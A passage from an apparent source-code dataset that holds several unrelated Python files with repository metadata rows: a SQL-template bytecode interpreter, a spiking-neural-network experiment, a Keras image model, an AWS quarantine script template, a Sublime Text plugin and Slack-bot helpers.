raise exception.DisError(opname)
elif opname == 'DELETE_ATTR':
# TODO
raise exception.DisError(opname)
elif opname == 'STORE_GLOBAL':
global_dict[argval] = stack.pop()
elif opname == 'DELETE_GLOBAL':
del global_dict[argval]
elif opname == 'LOAD_CONST':
stack.append(argval)
elif opname == 'LOAD_NAME':
if argval in local_dict:
stack.append(local_dict[argval])
elif argval in global_dict:
stack.append(global_dict[argval])
else:
stack.append(ast.Identifier(argval))
elif opname == 'BUILD_TUPLE':
stack[len(stack) - arg:] = tuple(stack[len(stack) - arg:]),
elif opname == 'BUILD_LIST':
stack[len(stack) - arg:] = stack[len(stack) - arg:],
elif opname == 'BUILD_SET':
stack[len(stack) - arg:] = set(stack[len(stack) - arg:]),
elif opname == 'BUILD_MAP':
stack[len(stack) - 2 * arg:] = dict(
zip(
stack[len(stack) - 2 * arg::2],
stack[len(stack) - 2 * arg + 1::2]
)
),
elif opname == 'BUILD_CONST_KEY_MAP':
stack[-arg - 1:] = dict(zip(stack[-1], stack[-arg - 1:-1])),
elif opname == 'BUILD_STRING':
stack[len(stack) - arg:] = ''.join(stack[len(stack) - arg:]),
elif opname == 'BUILD_TUPLE_UNPACK':
stack[len(stack) - arg:] = tuple(
member
for value in stack[len(stack) - arg:]
for member in value
),
elif opname == 'BUILD_TUPLE_UNPACK_WITH_CALL':
stack[len(stack) - arg:] = tuple(
member
for value in stack[len(stack) - arg:]
for member in value
),
elif opname == 'BUILD_LIST_UNPACK':
stack[len(stack) - arg:] = [
member
for value in stack[len(stack) - arg:]
for member in value
],
elif opname == 'BUILD_SET_UNPACK':
stack[len(stack) - arg:] = {
member
for value in stack[len(stack) - arg:]
for member in value
},
elif opname == 'BUILD_MAP_UNPACK':
stack[len(stack) - arg:] = dict(
member
for value in stack[len(stack) - arg:]
for member in value.items()
),
elif opname == 'BUILD_MAP_UNPACK_WITH_CALL':
stack[len(stack) - arg:] = dict(
member
for value in stack[len(stack) - arg:]
for member in value.items()
),
elif opname == 'LOAD_ATTR':
if isinstance(stack[-1], ast.BaseStatement):
stack[-1] = ast.SimpleClause(stack[-1], argval)
else:
stack[-1] = call_named('tupleElement', stack[-1], argval)
elif opname == 'COMPARE_OP':
# notice: see dis.cmp_op
if argval == '<':
stack[-2:] = call_named('less', *stack[-2:]),
elif argval == '<=':
stack[-2:] = call_named('lessOrEquals', *stack[-2:]),
elif argval == '==':
stack[-2:] = call_named('equals', *stack[-2:]),
elif argval == '!=':
stack[-2:] = call_named('notEquals', *stack[-2:]),
elif argval == '>':
stack[-2:] = call_named('greater', *stack[-2:]),
elif argval == '>=':
stack[-2:] = call_named('greaterOrEquals', *stack[-2:]),
elif argval == 'in':
stack[-2:] = call_named('in', *stack[-2:]),
elif argval == 'not in':
stack[-2:] = call_named('notIn', *stack[-2:]),
elif argval == 'is':
stack[-2:] = call_named(
'and',
call_named(
'equals',
call_named('toTypeName', stack[-2]),
call_named('toTypeName', stack[-1])
),
call_named('equals', *stack[-2:])
),
elif argval == 'is not':
stack[-2:] = call_named(
'or',
call_named(
'notEquals',
call_named('toTypeName', stack[-2]),
call_named('toTypeName', stack[-1])
),
call_named('notEquals', *stack[-2:])
),
elif argval == 'exception match':
raise exception.DisError(opname)
elif argval == 'BAD':
raise exception.DisError(opname)
else:
raise exception.DisError(opname)
elif opname == 'IMPORT_NAME':
stack[-2:] = __import__(argval, fromlist=stack[-2], level=stack[-1]),
elif opname == 'IMPORT_FROM':
local_dict[argval] = getattr(stack[-1], argval)
elif opname == 'JUMP_FORWARD':
# TODO
raise exception.DisError(opname)
elif opname == 'POP_JUMP_IF_TRUE':
# TODO
raise exception.DisError(opname)
elif opname == 'POP_JUMP_IF_FALSE':
# TODO
raise exception.DisError(opname)
elif opname == 'JUMP_IF_TRUE_OR_POP':
# TODO
raise exception.DisError(opname)
elif opname == 'JUMP_IF_FALSE_OR_POP':
# TODO
raise exception.DisError(opname)
elif opname == 'JUMP_ABSOLUTE':
# TODO
raise exception.DisError(opname)
elif opname == 'FOR_ITER':
# TODO
raise exception.DisError(opname)
elif opname == 'LOAD_GLOBAL':
if argval in global_dict:
stack.append(global_dict[argval])
else:
stack.append(ast.Identifier(argval))
elif opname == 'SETUP_FINALLY':
raise exception.DisError(opname)
elif opname == 'CALL_FINALLY':
raise exception.DisError(opname)
elif opname == 'LOAD_FAST':
stack.append(local_dict[argval])
elif opname == 'STORE_FAST':
local_dict[argval] = stack.pop()
elif opname == 'DELETE_FAST':
del local_dict[argval]
elif opname == 'LOAD_CLOSURE':
stack.append(cells[arg])
elif opname == 'LOAD_DEREF':
stack.append(cells[arg].cell_contents)
elif opname == 'LOAD_CLASSDEREF':
stack.append(cells[arg].cell_contents)
elif opname == 'STORE_DEREF':
cells[arg].cell_contents = stack.pop()
elif opname == 'DELETE_DEREF':
del cells[arg].cell_contents
elif opname == 'RAISE_VARARGS':
raise exception.DisError(opname)
elif opname == 'CALL_FUNCTION':
if isinstance(stack[-arg - 1], ast.Identifier):
stack[-arg - 1:] = ast.Call(
stack[-arg - 1],
*stack[len(stack) - arg:]
),
elif isinstance(stack[-arg - 1], ast.Call):
stack[-arg - 1:] = ast.Call(
stack[-arg - 1],
*stack[len(stack) - arg:]
),
elif isinstance(stack[-arg - 1], ast.BaseStatement):
stack[-arg - 1:] = ast.ListClause(
stack[-arg - 1],
*stack[len(stack) - arg:]
),
else:
stack[-arg - 1:] = stack[-arg - 1](*stack[len(stack) - arg:]),
elif opname == 'CALL_FUNCTION_KW':
if isinstance(stack[-arg - 2], ast.Identifier):
if stack[-1]:
raise TypeError()
stack[-arg - 2:] = ast.Call(stack[-arg - 2], *stack[-arg - 1:-1]),
elif isinstance(stack[-arg - 2], ast.Call):
if stack[-1]:
raise TypeError()
stack[-arg - 2:] = ast.Call(stack[-arg - 2], *stack[-arg - 1:-1]),
elif isinstance(stack[-arg - 2], ast.BaseStatement):
stack[-arg - 2:] = ast.ListClause(
stack[-arg - 2],
*stack[-arg - 1:-len(stack[-1]) - 1],
**dict(zip(stack[-1], stack[-len(stack[-1]) - 1:-1]))
),
else:
stack[-arg - 2:] = stack[-arg - 2](
*stack[-arg - 1:-len(stack[-1]) - 1],
**dict(zip(stack[-1], stack[-len(stack[-1]) - 1:-1]))
),
elif opname == 'CALL_FUNCTION_EX':
if arg & 1:
kwargs = stack[-1]
stack.pop()
else:
kwargs = {}
if isinstance(stack[-2], ast.Identifier):
if kwargs:
raise TypeError()
stack[-2:] = ast.Call(stack[-2], *stack[-1]),
elif isinstance(stack[-2], ast.Call):
if kwargs:
raise TypeError()
stack[-2:] = ast.Call(stack[-2], *stack[-1]),
elif isinstance(stack[-2], ast.BaseStatement):
stack[-2:] = ast.ListClause(stack[-2], *stack[-1], **kwargs),
else:
stack[-2:] = stack[-2](*stack[-1], **kwargs),
elif opname == 'LOAD_METHOD':
if isinstance(stack[-1], ast.BaseStatement):
stack[-1:] = ast.SimpleClause(stack[-1], argval), stack[-1]
else:
stack[-1:] = getattr(stack[-1], argval).__func__, stack[-1]
elif opname == 'CALL_METHOD':
if isinstance(stack[-arg - 2], ast.BaseStatement):
stack[-arg - 2:] = ast.ListClause(
stack[-arg - 2],
*stack[len(stack) - arg:]
),
else:
stack[-arg - 2:] = stack[-arg - 2](*stack[-arg - 1:]),
elif opname == 'MAKE_FUNCTION':
# TODO
if arg & 8:
function = sql_template(
types.FunctionType(
stack[-2],
global_dict,
stack[-1],
closure=stack[-3]
)
)
del stack[-3:]
else:
function = sql_template(
types.FunctionType(stack[-2], global_dict, stack[-1])
)
del stack[-2:]
if arg & 4:
# notice: annotation is not used
stack.pop()
if arg & 2:
function.__kwdefaults__ = stack.pop()
if arg & 1:
function.__defaults__ = stack.pop()
stack.append(function)
elif opname == 'BUILD_SLICE':
stack[len(stack) - arg:] = slice(stack[len(stack) - arg:]),
elif opname == 'EXTENDED_ARG':
raise exception.DisError(opname)
elif opname == 'FORMAT_VALUE':
if arg & 4:
spec = stack[-1]
stack.pop()
else:
spec = ''
if arg & 3 == 0:
stack[-1] = format(stack[-1], spec)
elif arg & 3 == 1:
stack[-1] = format(str(stack[-1]), spec)
elif arg & 3 == 2:
stack[-1] = format(repr(stack[-1]), spec)
elif arg & 3 == 3:
stack[-1] = format(ascii(stack[-1]), spec)
elif opname == 'HAVE_ARGUMENT':
raise exception.DisError(opname)
else:
raise exception.DisError(opname)
return False
def sql_template(
function: types.FunctionType
) -> types.FunctionType:
signature = inspect.signature(function)
instructions = list(dis.get_instructions(function))
@functools.wraps(function)
def build(
*args: typing.Any,
**kwargs: typing.Any
) -> typing.Any:
bound_arguments = signature.bind(*args, **kwargs)
bound_arguments.apply_defaults()
global_dict: typing.Dict[str, typing.Any] = {
# supported queries:
# with ... select ...
# select ...
# insert into ... select ...
# create table ... engine = ... as select ...
# create view ... as select ...
# create materialized view ... as select ...
'with_': ast.Initial('with'),
'select': ast.Initial('select'),
'select_distinct': ast.Initial('select_distinct'),
'insert': ast.Initial('insert'),
'insert_into': ast.Initial('insert_into'),
'create': ast.Initial('create'),
'create_table': ast.Initial('create_table'),
'create_table_if_not_exists':
ast.Initial('create_table_if_not_exists'),
'create_view': ast.Initial('create_view'),
'create_or_replace_view': ast.Initial('create_or_replace_view'),
'create_view_if_not_exists':
ast.Initial('create_view_if_not_exists'),
'create_materialized_view':
ast.Initial('create_materialized_view'),
'create_materialized_view_if_not_exists':
ast.Initial('create_materialized_view_if_not_exists'),
}
local_dict: typing.Dict[str, typing.Any] = {
**bound_arguments.arguments,
}
# TODO: use types.CellType in type annotation
cells: typing.Tuple[typing.Any, ...] = (
*(function.__closure__ or ()),
*(
types.CellType() # type: ignore[attr-defined]
for _ in function.__code__.co_cellvars or ()
),
)
stack: typing.List[typing.Any] = []
# notice: see dis.opmap
for instruction in instructions:
done = _run(
global_dict,
local_dict,
cells,
stack,
instruction.opname,
instruction.arg,
instruction.argval
)
if done:
assert len(stack) == 1
return stack.pop()
return None
# TODO
return typing.cast(types.FunctionType, build)
def sql_render(
function: types.FunctionType,
*args: typing.Any,
**kwargs: typing.Any
) -> str:
result = sql_template(function)(*args, **kwargs)
if isinstance(result, ast.BaseAST):
return result.render_statement()
return ast.Value(result).render_statement()
| 34.959481 | 78 | 0.522856 | 2,362 | 21,570 | 4.626164 | 0.108383 | 0.10982 | 0.038437 | 0.057655 | 0.647387 | 0.555779 | 0.501876 | 0.400018 | 0.322595 | 0.307038 | 0 | 0.01783 | 0.323968 | 21,570 | 616 | 79 | 35.016234 | 0.731518 | 0.032221 | 0 | 0.384335 | 0 | 0 | 0.11842 | 0.017705 | 0 | 0 | 0 | 0.001623 | 0.001821 | 1 | 0.009107 | false | 0.001821 | 0.020036 | 0.001821 | 0.043716 | 0.001821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8c81ea4259f7269d85baaa020e21e5d8275cc7a | 6,229 | py | Python | neuronPopulation/testSpikeCount.py | pvili/SpikingTimeDependentPlasticity | dd0ed5eb5b54ce922035e119bc8299c75d9407ed | [
"MIT"
] | 6 | 2019-11-22T20:44:09.000Z | 2021-02-04T08:04:39.000Z | neuronPopulation/testSpikeCount.py | nikhil-garg/SpikingTimeDependentPlasticity | dd0ed5eb5b54ce922035e119bc8299c75d9407ed | [
"MIT"
] | null | null | null | neuronPopulation/testSpikeCount.py | nikhil-garg/SpikingTimeDependentPlasticity | dd0ed5eb5b54ce922035e119bc8299c75d9407ed | [
"MIT"
] | 2 | 2020-09-06T07:41:32.000Z | 2021-02-04T08:04:41.000Z | import spiking_neural_networks as snn
import data_processing as dp
import plotingFunctions as pF
import test_functions as tF
import numpy as np
from math import factorial
import time
import matplotlib.pyplot as plt
repetitions =301 #501
print('Running File: Test Spike Implosion')
neurons = 1000#5000
t_ref = 2.
time_intervals_count = [50, 100, 500, 1000, 5000, 10000, 50000]
sync_tau = 10#10
max_time = 100
sync_window = [0, 50]
def estimateSpikeCount(samples_first, samples_ISI, time_intervals = time_intervals_count, neurons = neurons):
time_interv = time_intervals[:]
time_max = max(time_interv)
spike_times = dp.probabilistic_spike_sampling_population(samples_first, samples_ISI, time_max, neurons)
spikesCount = []
count = 0
t = 0
next_time_limit = time_interv.pop(0)
while time_interv:
while t < next_time_limit:
t = spike_times.pop(0)
count = count + 1
spikesCount.append(count)
next_time_limit = time_interv.pop(0)
while t < next_time_limit:
t = spike_times.pop(0)
count = count + 1
spikesCount.append(count)
return spikesCount
def computeSynchronization(spikes, neurons, window_count = sync_tau, time_interval = [0, 100]):
(S_max, t_max) = dp.max_spikes_in_window(spikes, neurons, window_count)
if time_interval:
spikes_count = dp.count_spikes_in_time_window(spikes, time_interval)
spikeRate = float(spikes_count)/float(max(time_interval) - min(time_interval))
else:
time_length = (spikes[-1])[1] #use the time of the last spike as proxy
spikeRate = len(spikes)/time_length
averageSpikesPerTau = spikeRate*window_count
synch = float(S_max)/averageSpikesPerTau
return synch
def calculateSynchEvolution(sim_results, neurons, tau = sync_tau, rep = [0,-1]):
synch_list= []
for r in rep:
s = computeSynchronization(sim_results[r], neurons, tau)
synch_list.append(s)
return synch_list
def plot_synch_evolution(filename, neurons, tau, repetitions = range(0,300), label = []):
sim_results = dp.read_simulation_results(filename)
synch_list = calculateSynchEvolution(sim_results, neurons, tau, repetitions)
plt.plot(repetitions, synch_list, label=label)
def print_synch_evoluiton(filename, neurons, tau):
sim_results = dp.read_simulation_results(filename)
synch_list = calculateSynchEvolution(sim_results, neurons, tau)
print('Synchrony from ' + str(synch_list[0]) + ' to ' + str(synch_list[1]))
def spike_count_evolution(sim_results, time_intervals = time_intervals_count, neurons = 2000):
[init_first, init_ISI] = dp.extract_samples(sim_results[0], neurons)
[final_first, final_ISI] = dp.extract_samples(sim_results[-1], neurons)
spikes_count_init = estimateSpikeCount(init_first, init_ISI, time_intervals , neurons)
spikes_count_final = estimateSpikeCount(final_first, final_ISI, time_intervals , neurons)
print('Init Count: '+str(spikes_count_init))
print('Fin Count: '+str(spikes_count_final))
ratio = [round(float(fin - init)/init*100,1) for (init, fin) in zip(spikes_count_init, spikes_count_final)]
print('Ratio (%): '+ str(ratio))
return (spikes_count_init, spikes_count_final, ratio)
#
start = time.time()
print('Synch and Count Evolution')
rateVec = [0.1, 0.33, 1]
timeIntervalVec = [500, 200, 100, 50]
inputProbVec = [0.1, 0.33, 0.66, 1] #For simulations change to 0.9
table_initial_count = []
table_final_count = []
for rate_idx in range(len(rateVec)):
inputRate = rateVec[rate_idx]
timeInterval = timeIntervalVec[rate_idx]
snn.delay_SP_max = timeInterval
for inputProb in inputProbVec:
nameFile = 'simR'+str(inputRate)+'P'+str(inputProb)
print('Plot for Rate: '+str(inputRate)+' and Input Prob: '+str(inputProb) )
snn.delay_SP_max = timeInterval
SNN = snn.LIF_Network(neurons, int(inputRate*timeInterval))
SNN.initial_noise()
sim_results = tF.test(repetitions, SNN, inputProb)
dp.write_simulation_results(sim_results, nameFile)
# sim_results = dp.read_simulation_results(nameFile)
spikeCountEvolution = spike_count_evolution(sim_results, neurons = neurons)
table_initial_count.append(spikeCountEvolution[0])
table_final_count.append(spikeCountEvolution[1])
pF.savePlots = False
endMain = time.time()
print('Time main: ' + str(int(endMain-start)/60) + ' minutes')
start = endMain
dp.write_spike_count_table(table_initial_count, table_final_count, './tableSpikeCount.csv', time_intervals_count, rateVec, inputProbVec)
files_list = ['simR1P0.33', 'simR0.33P0.33', 'simR1P1', 'simR0.33P1']
legend_list = ['IR = 1 Hz, SP = 0.33','IR = 0.33 Hz, SP = 0.33','IR = 1 Hz, SP = 1','IR = 0.33 Hz, SP = 1']
time_intervals = [50*10**e for e in np.linspace(0,1.5,15)]
pF.plot_spike_count_evoluiton(files_list, time_intervals, neurons, legend_list = legend_list, saveFig = True)
print('Tau = 2, SP = 0.33, IR = 0.33')
print_synch_evoluiton('simR0.33P0.33', range(1,neurons), 2)
print('Tau = 5, P = 0.33, IR = 0.33')
print_synch_evoluiton('simR0.33P0.33', range(1,neurons), 5)
print('Tau = 10, P = 0.33, IR = 0.33')
print_synch_evoluiton('simR0.33P0.33', range(1,neurons), 10)
print('Tau = 2, P = 1, IR = 0.33')
print_synch_evoluiton('simR0.33P1', range(1,neurons), 2)
print('Tau = 5, P = 1, IR = 0.33')
print_synch_evoluiton('simR0.33P1', range(1,neurons), 5)
print('Tau = 10, P = 1, IR = 0.33')
print_synch_evoluiton('simR1P1', range(1,neurons), 10)
print('Tau = 2, SP = 0.33, IR = 1')
print_synch_evoluiton('simR1P0.33', range(1,neurons), 2)
print('Tau = 5, P = 0.33, IR = 1')
print_synch_evoluiton('simR1P0.33', range(1,neurons), 5)
print('Tau = 10, P = 0.33, IR = 1')
print_synch_evoluiton('simR1P0.33', range(1,neurons), 10)
print('Tau = 2, P = 1, IR = 1')
print_synch_evoluiton('simR1P1', range(1,neurons), 2)
print('Tau = 5, P = 1, IR = 1')
print_synch_evoluiton('simR1P1', range(1,neurons), 5)
print('Tau = 10, P = 1, IR = 1')
print_synch_evoluiton('simR1P1', range(1,neurons), 10)
| 36.215116 | 136 | 0.688875 | 886 | 6,229 | 4.62754 | 0.189616 | 0.013171 | 0.060244 | 0.014634 | 0.391707 | 0.338049 | 0.264146 | 0.25878 | 0.233171 | 0.233171 | 0 | 0.057931 | 0.185262 | 6,229 | 171 | 137 | 36.426901 | 0.749951 | 0.021673 | 0 | 0.128 | 0 | 0 | 0.12044 | 0.003451 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048 | false | 0 | 0.064 | 0 | 0.144 | 0.264 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cabd66d869fd02374ca8bfaac4b224efa1d798 | 1,377 | py | Python | models/vgg_model.py | wufy1992/FruitRecognition | 541920d694d7416e7551f71b2eba92fe043ba072 | [
"MIT"
] | 1 | 2021-04-14T15:52:13.000Z | 2021-04-14T15:52:13.000Z | models/vgg_model.py | wufy1992/FruitRecognition | 541920d694d7416e7551f71b2eba92fe043ba072 | [
"MIT"
] | 1 | 2021-06-14T13:02:04.000Z | 2021-06-14T13:02:04.000Z | models/vgg_model.py | wufy1992/FruitRecognition | 541920d694d7416e7551f71b2eba92fe043ba072 | [
"MIT"
] | 1 | 2021-05-16T04:11:02.000Z | 2021-05-16T04:11:02.000Z | #!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
from keras import backend as K
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Activation
from keras.layers import Reshape, Lambda, BatchNormalization, ZeroPadding2D
from keras.layers.core import Dense, Dropout, Activation, Flatten
def get_model(input_dim, category_num):
"""
Build Convolution Neural Network
args : nb_classes (int) number of classes
returns : model (keras NN) the Neural Net model
"""
chanDim = 1
model = Sequential()
model.add(Conv2D(32, (3, 3), padding="same", input_shape=(input_dim[0], input_dim[1], 3)))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(32, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(Conv2D(64, (3, 3), padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(category_num, activation='softmax'))
return model
| 33.585366 | 95 | 0.69281 | 186 | 1,377 | 5.075269 | 0.360215 | 0.152542 | 0.059322 | 0.055085 | 0.483051 | 0.483051 | 0.483051 | 0.483051 | 0.450212 | 0.450212 | 0 | 0.036207 | 0.157589 | 1,377 | 40 | 96 | 34.425 | 0.777586 | 0.122004 | 0 | 0.518519 | 0 | 0 | 0.032939 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.185185 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cb651503bbc5146cbb3c32633cdc86dfc9199c | 1,843 | py | Python | home-machines/.vim/python-template.py | tdowg1/dotfiles | 215e151748776a07d8fe55ddfd6773aed7169ad3 | [
"MIT"
] | 2 | 2015-07-24T18:28:03.000Z | 2017-04-20T13:40:59.000Z | home-machines/.vim/python-template.py | tdowg1/dotfiles | 215e151748776a07d8fe55ddfd6773aed7169ad3 | [
"MIT"
] | null | null | null | home-machines/.vim/python-template.py | tdowg1/dotfiles | 215e151748776a07d8fe55ddfd6773aed7169ad3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import click
import boto3
import logging
import datetime
import sys
from pprint import pformat
from pprint import pprint
logger = logging.getLogger()
def tags_to_map(tags):
tag_map = {}
for tag in tags:
tag_map[tag['Key']] = tag['Value']
return tag_map
def abc(ip, ec2):
tag_map = tags_to_map(instance.tags)
logger.debug(tag_map)
return ip, tag_map
def ghi(ec2, instance):
logger.info("Locating")
groups = list(ec2.security_groups.filter(Filters=[{"Name":"tag-key", "Values":["Quarantine"]},
{"Name":"vpc-id", "Values":[instance.vpc_id]}
]))
if not group_id:
logger.error("Could Not Identify")
sys.exit(5)
@click.command()
@click.option("--ip", "-i", help="IP Address to quarantine", required=True)
@click.option("--loglevel", "-l", type=click.Choice(['DEBUG','INFO','WARN','ERROR'], case_sensitive=True), default="INFO")
def jkl(ip, loglevel):
#logging.basicConfig(filename=__file__ + ".log")
logging.basicConfig()
logger.setLevel(loglevel)
logger.info(datetime.datetime.now().isoformat())
ec2 = boto3.resource("ec2")
ec2_client = boto3.client("ec2")
ip, tag_map = abc(ip, ec2)
logger.info("Instance located")
ghi(ec2, instance)
logger.info("Instance quarantined")
if "aws:autoscaling:groupName" in tag_map:
# Set the instance to standby to start automatic recovery
autoscaling = boto3.client("autoscaling")
autoscaling.enter_standby(InstanceIds=[instance.instance_id],
AutoScalingGroupName=tag_map["aws:autoscaling:groupName"],
ShouldDecrementDesiredCapacity=False)
if __name__ == "__main__":
jkl()
| 30.213115 | 122 | 0.620184 | 216 | 1,843 | 5.143519 | 0.430556 | 0.048605 | 0.028803 | 0.036004 | 0.043204 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010753 | 0.243082 | 1,843 | 60 | 123 | 30.716667 | 0.785663 | 0.067282 | 0 | 0 | 0 | 0 | 0.146853 | 0.029138 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.155556 | 0 | 0.288889 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cc71d8c4f3cf2e925f127a0d7c8d6af35f1aa2 | 1,452 | py | Python | EthanBrown.SublimeText2.UtilPackages/tools/PackageCache/RecentActiveFiles/RecentActiveFiles.py | michaelray/Iristyle-ChocolateyPackages | 5051538253ff095af4b64d469137b23420f28be0 | [
"MIT"
] | 18 | 2015-01-14T13:36:47.000Z | 2020-10-22T19:53:57.000Z | EthanBrown.SublimeText2.UtilPackages/tools/PackageCache/RecentActiveFiles/RecentActiveFiles.py | michaelray/Iristyle-ChocolateyPackages | 5051538253ff095af4b64d469137b23420f28be0 | [
"MIT"
] | 12 | 2015-04-13T13:56:14.000Z | 2017-02-04T08:35:35.000Z | EthanBrown.SublimeText2.UtilPackages/tools/PackageCache/RecentActiveFiles/RecentActiveFiles.py | michaelray/Iristyle-ChocolateyPackages | 5051538253ff095af4b64d469137b23420f28be0 | [
"MIT"
] | 30 | 2015-01-20T12:32:53.000Z | 2019-01-26T12:39:02.000Z | import sublime_plugin
import os
class RecentActiveFilesEventListener(sublime_plugin.EventListener):
def on_activated(self, view):
if view.file_name():
view.window().run_command("recent_active_files", { "file_name": view.file_name() })
class RecentActiveFilesCommand(sublime_plugin.WindowCommand):
def __init__(self, window):
sublime_plugin.WindowCommand.__init__(self, window)
self.recent_active_files = []
def unshift(self, file_name):
if file_name in self.recent_active_files:
self.recent_active_files.remove(file_name)
self.recent_active_files.insert(0, file_name)
def path_form_project(self, path):
for folder in self.window.folders():
path = path.replace(folder + '/', '', 1)
return path
def run(self, file_name=None):
if file_name:
self.unshift(file_name)
else:
if self.window.active_view() is not None:
active_file = self.window.active_view().file_name()
files = filter(lambda f: f != active_file, self.recent_active_files)
else:
files = self.recent_active_files
items = [[os.path.basename(f), self.path_form_project(f)] for f in files]
def on_done(index):
if index >= 0:
self.window.open_file(files[index])
self.window.show_quick_panel(items, on_done)
| 35.414634 | 95 | 0.632231 | 179 | 1,452 | 4.837989 | 0.296089 | 0.101617 | 0.137413 | 0.145497 | 0.060046 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00282 | 0.267218 | 1,452 | 40 | 96 | 36.3 | 0.81109 | 0 | 0 | 0.0625 | 0 | 0 | 0.019972 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.0625 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8cdbc45f9b78516ff3de6e214b3734502e88f2e | 2,595 | py | Python | phial/utils.py | sedders123/phial | 1a8d7a2bdbf37cc4b44252e7a783f51ff88689cb | [
"MIT"
] | 13 | 2017-07-01T23:30:36.000Z | 2021-04-16T09:32:23.000Z | phial/utils.py | sedders123/phial | 1a8d7a2bdbf37cc4b44252e7a783f51ff88689cb | [
"MIT"
] | 468 | 2017-07-02T16:03:02.000Z | 2022-03-31T16:14:20.000Z | phial/utils.py | sedders123/phial | 1a8d7a2bdbf37cc4b44252e7a783f51ff88689cb | [
"MIT"
] | 5 | 2018-06-01T21:40:37.000Z | 2018-12-09T21:07:38.000Z | """Helper utilities for phial."""
import re
from inspect import Parameter, Signature, signature
from typing import Any, Callable, Dict, List, Optional
from phial.errors import ArgumentTypeValidationError, ArgumentValidationError
from phial.wrappers import Message
def validate_kwargs(func: Callable, kwargs: Dict[str, str]) -> Dict[str, Any]:
"""Validate kwargs match a functions signature."""
func_params = signature(func).parameters
validated_kwargs: Dict[str, Any] = {}
for key in func_params.values():
value = None
if key.default is not Parameter.empty:
value = key.default
if value is None and key.name not in kwargs:
raise ArgumentValidationError(
"Parameter {0} not provided to {1}".format(key.name, func.__name__)
)
elif key.name in kwargs:
value = kwargs[key.name]
if key.annotation is not Signature.empty:
try:
value = key.annotation(value)
except ValueError:
raise ArgumentTypeValidationError(
"{0} could not be converted to {1}".format(
value, key.annotation.__name__
)
)
validated_kwargs[key.name] = value
return validated_kwargs
def parse_help_text(help_text: str) -> str:
"""Parse help text."""
NEW_LINE_SEPERATOR = "<__NEW_LINE_SEPERATOR__>"
# Strip excess whitespace
help_text = help_text.strip()
# Remove single new lines
help_text = help_text.replace("\n", NEW_LINE_SEPERATOR)
help_text = help_text.replace(NEW_LINE_SEPERATOR * 2, "\n")
help_text = help_text.replace(NEW_LINE_SEPERATOR, "")
# Remove extra spaces
help_text = re.sub(r"(^[ \t]+|[ \t]+)", " ", help_text, flags=re.M)
return help_text
def parse_slack_output(slack_rtm_output: List[Dict]) -> Optional["Message"]:
"""Parse Slack output."""
output_list = slack_rtm_output
if output_list and len(output_list) > 0:
for output in output_list:
if output and "text" in output:
bot_id = None
team = None
if "team" in output:
team = output["team"]
if "bot_id" in output:
bot_id = output["bot_id"]
return Message(
output["text"],
output["channel"],
output["user"],
output["ts"],
team,
bot_id,
)
return None
| 33.269231 | 83 | 0.576108 | 294 | 2,595 | 4.891156 | 0.309524 | 0.077886 | 0.041725 | 0.055633 | 0.070236 | 0.054242 | 0.054242 | 0.054242 | 0 | 0 | 0 | 0.003436 | 0.327168 | 2,595 | 77 | 84 | 33.701299 | 0.82016 | 0.068593 | 0 | 0 | 0 | 0 | 0.066416 | 0.010025 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.087719 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8d0bf1cab823cb7a7dc7f6aa4476e08694bf314 | 1,748 | py | Python | eda/numerical_data/scatter_plot.py | kmsk99/data_science_toolbar | d139b83d4547b00249d35ba76da5c063c80f4bc2 | [
"MIT"
